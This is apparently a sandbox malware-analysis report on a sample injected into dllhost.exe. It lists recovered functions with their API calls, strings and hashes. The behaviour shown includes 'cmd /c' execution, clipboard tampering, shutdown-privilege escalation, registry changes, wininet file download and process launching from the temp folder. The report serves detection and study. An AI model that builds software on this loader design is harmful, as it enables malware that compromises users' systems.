Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 032A6815
_memset.LIBCMT ref: 032A69C2
wsprintfA.USER32 ref: 032A69D9
ShellExecuteA.SHELL32(00000000,open,cmd,?,00000000,00000000), ref: 032A69FA
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 032A6A4E
Sleep.KERNEL32(000003E8), ref: 032A6AA5
OpenClipboard.USER32(00000000), ref: 032A6B1A
EmptyClipboard.USER32 ref: 032A6B24
GlobalAlloc.KERNEL32(00002000,00000001), ref: 032A6B31
GlobalLock.KERNEL32(00000000), ref: 032A6B3B
GlobalUnlock.KERNEL32(00000000), ref: 032A6B4E
SetClipboardData.USER32(00000001,00000000), ref: 032A6B57
CloseClipboard.USER32 ref: 032A6B5D

Strings

Enable, xrefs: 032A6AF0
open, xrefs: 032A69F3, 032A6A47
cmd, xrefs: 032A69EE
CopyC, xrefs: 032A6893
/c %s, xrefs: 032A69D3
False, xrefs: 032A6AEB
Remark, xrefs: 032A698A

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Clipboard$Global$ExecuteShell$AllocCloseCountDataEmptyLockOpenSleepTickUnlock_memsetwsprintf
String ID: /c %s$CopyC$Enable$False$Remark$cmd$open
API String ID: 195233984-497360582
Opcode ID: bbdcaf34ff3db04e4c5145a9a487320e8c876d9685bd7c7bde62f4a2c4fc7204
Instruction ID: c62c5087f32bf2ebfe3b2d5fa5c1bda4fd076b8b47f980addef07d60c5f32294
Opcode Fuzzy Hash: bbdcaf34ff3db04e4c5145a9a487320e8c876d9685bd7c7bde62f4a2c4fc7204
Instruction Fuzzy Hash: 87912936724B049BD620FB6DB845B6FB794EB95321F04442FEA8D8F280CBB154C5C7A2

Function 032920E4 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 03293D15
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03293D2A
UnhandledExceptionFilter.KERNEL32(032A9370), ref: 03293D35
GetCurrentProcess.KERNEL32(C0000409), ref: 03293D51
TerminateProcess.KERNEL32(00000000), ref: 03293D58

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 72af5334c9e9eee24e4a8b54ac16748f7402351930f5060302953ff3a463d643
Instruction ID: 0a530285c4f84cb1e60dd33708c1676c72c2217b96fa8ddbec3b7bffb0e5893b
Opcode Fuzzy Hash: 72af5334c9e9eee24e4a8b54ac16748f7402351930f5060302953ff3a463d643
Instruction Fuzzy Hash: 8021BEB8510A04EFD710FF25FAAC6847BF4BB0C711F10C85AE90987649E7B85481CF05

Function 0329468F Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294697
__mtterm.LIBCMT ref: 032946A3

Part of subcall function 0329436E: DecodePointer.KERNEL32(00000005,03293A7D,03293A63,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 0329437F
Part of subcall function 0329436E: TlsFree.KERNEL32(0000000E,03293A7D,03293A63,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294399
Part of subcall function 0329436E: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03293A7D,03293A63,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 0329A165
Part of subcall function 0329436E: _free.LIBCMT ref: 0329A168
Part of subcall function 0329436E: DeleteCriticalSection.KERNEL32(0000000E,?,?,03293A7D,03293A63,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 0329A18F

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 032946B9
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 032946C6
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 032946D3
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 032946E0
TlsAlloc.KERNEL32(?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294730
TlsSetValue.KERNEL32(00000000,?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 0329474B
__init_pointers.LIBCMT ref: 03294755
EncodePointer.KERNEL32(?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294766
EncodePointer.KERNEL32(?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294773
EncodePointer.KERNEL32(?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 03294780
EncodePointer.KERNEL32(?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 0329478D
DecodePointer.KERNEL32(Function_000044F2,?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 032947AE
__calloc_crt.LIBCMT ref: 032947C3
DecodePointer.KERNEL32(00000000,?,?,032939BA,032AC4B8,00000008,03293B4E,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 032947DD
GetCurrentThreadId.KERNEL32 ref: 032947EF

Strings

FlsAlloc, xrefs: 032946B3
FlsGetValue, xrefs: 032946BB
KERNEL32.DLL, xrefs: 03294692
FlsSetValue, xrefs: 032946C8
FlsFree, xrefs: 032946D5

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 9d2b010a9775deba8f881f321a1dca64d71635a866371bf3727bcc798eab43dd
Instruction ID: e48cb312f5c967e0acc131a5236ffcbf8121fbff8b5b0a0a75470760ea7bb67a
Opcode Fuzzy Hash: 9d2b010a9775deba8f881f321a1dca64d71635a866371bf3727bcc798eab43dd
Instruction Fuzzy Hash: E7315E30920F15EFEB12FF7ABD0C6497FA4AB49B247248227E410D6148D77994C2DF90

Function 032A30B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 032A30CE
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 032A30E2
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 032A30ED
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 032A30F8
LoadLibraryA.KERNEL32(kernel32.dll), ref: 032A3102
GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 032A3111
LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 032A316B
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 032A3177
CloseHandle.KERNEL32(?), ref: 032A3187
FreeLibrary.KERNEL32(00000000), ref: 032A3198
FreeLibrary.KERNEL32(?), ref: 032A31A2

Strings

GetCurrentProcess, xrefs: 032A3108
OpenProcessToken, xrefs: 032A30DC
KERNEL32.dll, xrefs: 032A3166
GetLastError, xrefs: 032A3171
AdjustTokenPrivileges, xrefs: 032A30E4
ADVAPI32.dll, xrefs: 032A30C3
LookupPrivilegeValueA, xrefs: 032A30EF
kernel32.dll, xrefs: 032A30FA
SeShutdownPrivilege, xrefs: 032A313C

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AddressLibraryProc$Load$Free$CloseHandle
String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
API String ID: 2887716753-2040270271
Opcode ID: 6526f31fe8141371ae5eb9481dfbfeae77a92a3306a72dbafa3d3dfc29ce61df
Instruction ID: 0ef57c59782d6fe8dd59de894199029322612db2fff7de578376c1cf24f6d13f
Opcode Fuzzy Hash: 6526f31fe8141371ae5eb9481dfbfeae77a92a3306a72dbafa3d3dfc29ce61df
Instruction Fuzzy Hash: F131A171E1070CAFDF10EBB99C49FAFBBB8AF48701F014059E915F2141CAB49840CBA0

Function 032A3720 Relevance: 35.1, APIs: 6, Strings: 14, Instructions: 96libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,00000000,00000000), ref: 032A3788
GetProcAddress.KERNEL32(00000000), ref: 032A3791
LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 032A37C4
GetProcAddress.KERNEL32(00000000), ref: 032A37C7
LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 032A37E2
GetProcAddress.KERNEL32(00000000), ref: 032A37E5

Strings

enMe, xrefs: 032A37AC
niti, xrefs: 032A3770
Free, xrefs: 032A37D4
AndI, xrefs: 032A3769
mber, xrefs: 032A37B3
ship, xrefs: 032A37BA
Allo, xrefs: 032A375B
Sid, xrefs: 032A37DB
Chec, xrefs: 032A379E
cate, xrefs: 032A3762
eSid, xrefs: 032A377E
Advapi32.dll, xrefs: 032A379A, 032A379D
aliz, xrefs: 032A3777
kTok, xrefs: 032A37A5

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Advapi32.dll$Allo$AndI$Chec$Free$Sid$aliz$cate$eSid$enMe$kTok$mber$niti$ship
API String ID: 2574300362-3168299024
Opcode ID: de4bb7b1b7bd259de1bb510e4e98d4676d53cade85d4ed063e29833280b0627b
Instruction ID: 6579b947ecb0ffd7ede3924adeca25df75234e5e1383c9dd8694a504e6155354
Opcode Fuzzy Hash: de4bb7b1b7bd259de1bb510e4e98d4676d53cade85d4ed063e29833280b0627b
Instruction Fuzzy Hash: E431E1B2D0131CABCF10DFE9D985AEEBBB8FF48700F108519E505AB244DA745A05CBA5

Function 032A5910 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 181stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 032A5932
_strrchr.LIBCMT ref: 032A593A
_memset.LIBCMT ref: 032A596E
_strrchr.LIBCMT ref: 032A5976
_memset.LIBCMT ref: 032A5A02
wsprintfA.USER32 ref: 032A5A1A
_memset.LIBCMT ref: 032A5A2E
_memset.LIBCMT ref: 032A5A48
ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 032A5A8A
lstrcatA.KERNEL32(?,032AB7A4), ref: 032A5AD2
lstrcatA.KERNEL32(?), ref: 032A5ADC

Strings

%s\shell\open\command, xrefs: 032A5A14
D, xrefs: 032A5AFF
WinSta0\Default, xrefs: 032A5B0B
"%1, xrefs: 032A5A96

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _memset$_strrchrlstrcat$EnvironmentExpandStringswsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 609515672-33419044
Opcode ID: f2cf83f4ff2dd70802e06ee5f52cd4aa5293048e549b1d692cccfc921f38fa02
Instruction ID: 40d5c9015f8f246738df998553f03cf545139630e19516fb91c39de7cbfa4c77
Opcode Fuzzy Hash: f2cf83f4ff2dd70802e06ee5f52cd4aa5293048e549b1d692cccfc921f38fa02
Instruction Fuzzy Hash: D851247596471DABEB20D7689C45FEB77789B05B00F1044C9EA49AE081E7F097C8CFA1

Function 032A6C70 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 132libraryloaderfileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(032A5853,00000000,00000001,?), ref: 032A6C99
LoadLibraryA.KERNEL32(wininet.dll), ref: 032A6CB2
GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 032A6CC6
FreeLibrary.KERNEL32(00000000), ref: 032A6CE4
GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 032A6D03
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 032A6D36
_memset.LIBCMT ref: 032A6D5E
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 032A6D6C
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 032A6DA2
CloseHandle.KERNEL32(?), ref: 032A6DB8
Sleep.KERNEL32(00000001), ref: 032A6DC0
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 032A6DCC
FreeLibrary.KERNEL32(00000000), ref: 032A6DE1

Strings

InternetReadFile, xrefs: 032A6D66
InternetOpenA, xrefs: 032A6CC0
InternetOpenUrlA, xrefs: 032A6CFD
MSIE 6.0, xrefs: 032A6CCC
InternetCloseHandle, xrefs: 032A6DC6
wininet.dll, xrefs: 032A6CA1

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AddressProc$FileLibrary$Free$CloseCreateDeleteHandleLoadSleepWrite_memset
String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 455779405-4269851202
Opcode ID: 0df92125df0fdbc9d775b404f7216ff67c6aa503fcaf7187ce07d0652f3d8329
Instruction ID: 8a0ae210a84727edc2fa2e025e22430e491152f1015d1f3764e8aadf3a380c30
Opcode Fuzzy Hash: 0df92125df0fdbc9d775b404f7216ff67c6aa503fcaf7187ce07d0652f3d8329
Instruction Fuzzy Hash: 834182B561061CAFDB20EB699C85FDEB378AB84740F048199B709F6141CBB45EC58F68

Function 032A48F0 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 105libraryloaderstringCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,1D2AA39B), ref: 032A4933
GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 032A494A
GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 032A4954
GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 032A495F
GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 032A4967
GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 032A496F
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 032A497A
lstrlenA.KERNEL32(?), ref: 032A49CB
FreeLibrary.KERNEL32(00000000), ref: 032A49FF

Strings

RegDeleteValueA, xrefs: 032A4961
RegDeleteKeyA, xrefs: 032A4959
RegCreateKeyExA, xrefs: 032A493E
Time, xrefs: 032A490B
RegCloseKey, xrefs: 032A4974
ADVAPI32.dll, xrefs: 032A492E
RegOpenKeyExA, xrefs: 032A4969
RegSetValueExA, xrefs: 032A494E

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AddressProc$Library$FreeLoadlstrlen
String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA$Time
API String ID: 320228506-4066504548
Opcode ID: e401fb231bd80c79b9c5d2e07e2797bd011d8e4d7ad39e88c5b70f42f5f65b25
Instruction ID: 63c56a015ee7d039e9d5d960da0ac8065b1f8a3ccf7d30ed74cf147b4872406e
Opcode Fuzzy Hash: e401fb231bd80c79b9c5d2e07e2797bd011d8e4d7ad39e88c5b70f42f5f65b25
Instruction Fuzzy Hash: D9316B71A50B19BFDB10EBA9DC46FEEBBB8EF48B00F104115F911E6241D7B4A9808B64

Function 032A3850 Relevance: 28.1, APIs: 3, Strings: 13, Instructions: 96COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 032A3871
GetVersionExA.KERNEL32(?), ref: 032A388A
_strncpy.LIBCMT ref: 032A39AE

Strings

Windows 2008 R2, xrefs: 032A3901
Windows 8.1 Update 1, xrefs: 032A3952
Windows 2012, xrefs: 032A392B
Windows 10, xrefs: 032A399C
Windows 7 SP1, xrefs: 032A390B
Windows 2019, xrefs: 032A3990
Windows 2000, xrefs: 032A38AA
Unknown, xrefs: 032A39A8
Windows 8, xrefs: 032A3932
Windows 2012 R2, xrefs: 032A394B
Windows Vista SP2, xrefs: 032A38E4
Windows 2016, xrefs: 032A3982
Windows XP, xrefs: 032A38C2

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Version_memset_strncpy
String ID: Unknown$Windows 10$Windows 2000$Windows 2008 R2$Windows 2012$Windows 2012 R2$Windows 2016$Windows 2019$Windows 7 SP1$Windows 8$Windows 8.1 Update 1$Windows Vista SP2$Windows XP
API String ID: 1449955169-2950701659
Opcode ID: 8f2d6d2cb4f5e91fb1c83a6d4ebd1db49edbb20ed2783ca19ca92e54dbb1825e
Instruction ID: 21a3816924f994e4a842fa6eabe11f8b1b69e2f268878fe7447170fbd3db7ab3
Opcode Fuzzy Hash: 8f2d6d2cb4f5e91fb1c83a6d4ebd1db49edbb20ed2783ca19ca92e54dbb1825e
Instruction Fuzzy Hash: C0312338EB8B0BAFDF30C52C9C52F6D7269AB01B00F5445D6E71DE9582D9B045CACA07

Function 032A5EF0 Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 301COMMON

Download Yara Rule

Strings

ARPD, xrefs: 032A5FAF, 032A6022
isARDll, xrefs: 032A5F7F
%s\%s, xrefs: 032A6079
PluginMe, xrefs: 032A6172, 032A62D6
getDllName, xrefs: 032A6125
isCSDll, xrefs: 032A6164

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID:
String ID: %s\%s$ARPD$PluginMe$getDllName$isARDll$isCSDll
API String ID: 0-3715897580
Opcode ID: eddf7148fc3448a0aef7dc00eeb05c1dbb12ece34361df799012813d57b9561d
Instruction ID: 1295184e82bc5c3163f649e8d1a727bacab458c940965ca6cc5f678eb4d38441
Opcode Fuzzy Hash: eddf7148fc3448a0aef7dc00eeb05c1dbb12ece34361df799012813d57b9561d
Instruction Fuzzy Hash: C8B11B75D20B199FDF20DB689C40BEEB7789B44711F0845E5E508AB280EBB56AC4CF91

Function 032A31C0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 90libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,1D2AA39B), ref: 032A320A
GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 032A3220
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 032A322E
GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 032A323C
GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 032A324A
LoadLibraryA.KERNEL32(kernel32.dll), ref: 032A3257
GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 032A3267

Strings

GetThreadDesktop, xrefs: 032A3214
GetUserObjectInformationA, xrefs: 032A3228
SetThreadDesktop, xrefs: 032A3236
CloseDesktop, xrefs: 032A3244
user32.dll, xrefs: 032A31FF
kernel32.dll, xrefs: 032A3252
GetCurrentThreadId, xrefs: 032A3261

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
API String ID: 2238633743-588083535
Opcode ID: e81d3781ec5ffca0faf96728c696970540074091559c4d5bb05e5bf769d7fc27
Instruction ID: bb914379c92d9e772e591b9849519aafba6fbad9a3e760065d33464b569322b6
Opcode Fuzzy Hash: e81d3781ec5ffca0faf96728c696970540074091559c4d5bb05e5bf769d7fc27
Instruction Fuzzy Hash: 50314971A1062CAFDB24DF69CC85BEEBBB8EB48710F00419AE519E3241DB745E80CF90

Function 032A5780 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 122sleepprocessCOMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 032A57C5
_memset.LIBCMT ref: 032A57E2
GetTempPathA.KERNEL32(00000104,00000000), ref: 032A57F6
_memset.LIBCMT ref: 032A581C
wsprintfA.USER32 ref: 032A5835
GetFileAttributesA.KERNEL32(00000000), ref: 032A5865
_memset.LIBCMT ref: 032A587B
Sleep.KERNEL32(000003E8), ref: 032A589C
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 032A58C5

Strings

%s%s, xrefs: 032A582F
D, xrefs: 032A5888
WinSta0\Default, xrefs: 032A5892

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _memset$AttributesCreateFilePathProcessSleepTemp_strrchrwsprintf
String ID: %s%s$D$WinSta0\Default
API String ID: 1046919704-212261555
Opcode ID: de63e96c08e67dc96ea405817ca1523e0eca135bb4dca684fac09ab8b6020eb2
Instruction ID: 5c83d0976f80efdce1cb8d1a4867f009516d69de8be736286c26e941c3b0d160
Opcode Fuzzy Hash: de63e96c08e67dc96ea405817ca1523e0eca135bb4dca684fac09ab8b6020eb2
Instruction Fuzzy Hash: CC412E7691031CABEF10EB68EC49FEE737C9F55700F144595E608AA181DBB19AC8CB61

Function 032A6570 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 105sleepthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E5F
Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E79
Part of subcall function 032A4E40: GetComputerNameA.KERNEL32(00000000,?), ref: 032A4E99
Part of subcall function 032A4E40: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4EAF
Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4EC3
Part of subcall function 032A4E40: wsprintfA.USER32 ref: 032A4EDB

_memset.LIBCMT ref: 032A65B6
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 032A65CC
_strrchr.LIBCMT ref: 032A65DB
_strtok.LIBCMT ref: 032A65E9
wsprintfA.USER32 ref: 032A6615
CreateThread.KERNEL32(00000000,00000000,032A5EF0,00000000,00000000,00000000), ref: 032A667F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 032A6686
_strtok.LIBCMT ref: 032A669A
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000), ref: 032A66B1

Strings

ARPD, xrefs: 032A6584
%s\%s, xrefs: 032A660F

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _memset$Name_strtokwsprintf$CloseComputerCreateFileHandleModuleSleepThread_strrchrlstrcpy
String ID: %s\%s$ARPD
API String ID: 2842694341-582042800
Opcode ID: ffb34fa719b824364a58e71c32519b93274568369c32d7fb01e4fc37f92d25e2
Instruction ID: 4c08186940a8386b850b31032e133055819ce72323ea5f793a7faae0bdf86cc1
Opcode Fuzzy Hash: ffb34fa719b824364a58e71c32519b93274568369c32d7fb01e4fc37f92d25e2
Instruction Fuzzy Hash: 14312D76910709ABEB10E7289C45FDB77789F04B01F0945D5EA48AF281EBF4A6C4CFA1

Function 03291200 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0329124A
std::_Xinvalid_argument.LIBCPMT ref: 0329126B
_memmove.LIBCMT ref: 032912D3
_memmove.LIBCMT ref: 03291320
_memmove.LIBCMT ref: 03291369
_memmove.LIBCMT ref: 0329138F
std::_Xinvalid_argument.LIBCPMT ref: 032913CD

Strings

invalid string position, xrefs: 032913C8
string too long, xrefs: 03291245, 03291266

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 9b348c557170c680ca2b7a0744662c134b6076a933f458c0914190c5a1ce2012
Instruction ID: 195b674467951da8b82438147d539ff866772a31bb6ee8857eb0760f111b074e
Opcode Fuzzy Hash: 9b348c557170c680ca2b7a0744662c134b6076a933f458c0914190c5a1ce2012
Instruction Fuzzy Hash: 0B513975F25607BFEF14EA6DEE4597E366AEBC0610724866BD002CB784E638A8D0C744

Function 032A5C10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 126filestringthreadCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 032A5C52
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 032A5C79
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 032A5CB6
CloseHandle.KERNEL32(00000000), ref: 032A5CC1
wsprintfA.USER32 ref: 032A5CFD
lstrcpyA.KERNEL32(00000000,?), ref: 032A5D16
CreateThread.KERNEL32(00000000,00000000,Function_00015B70,00000000,00000000,00000000), ref: 032A5D57
CloseHandle.KERNEL32(00000000), ref: 032A5D5E

Strings

%s %s, xrefs: 032A5CF7

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: CloseCreateFileHandle$ThreadWrite_memsetlstrcpywsprintf
String ID: %s %s
API String ID: 3904585434-2939940506
Opcode ID: 7a5064831df232b53144c24160cd0eb26b6ff6852bb9f032919bb1be32b588bc
Instruction ID: 7a8182316ee1f8c0c0decfd8543cbdb7e51791dc0b69ad19a7838107234f06c1
Opcode Fuzzy Hash: 7a5064831df232b53144c24160cd0eb26b6ff6852bb9f032919bb1be32b588bc
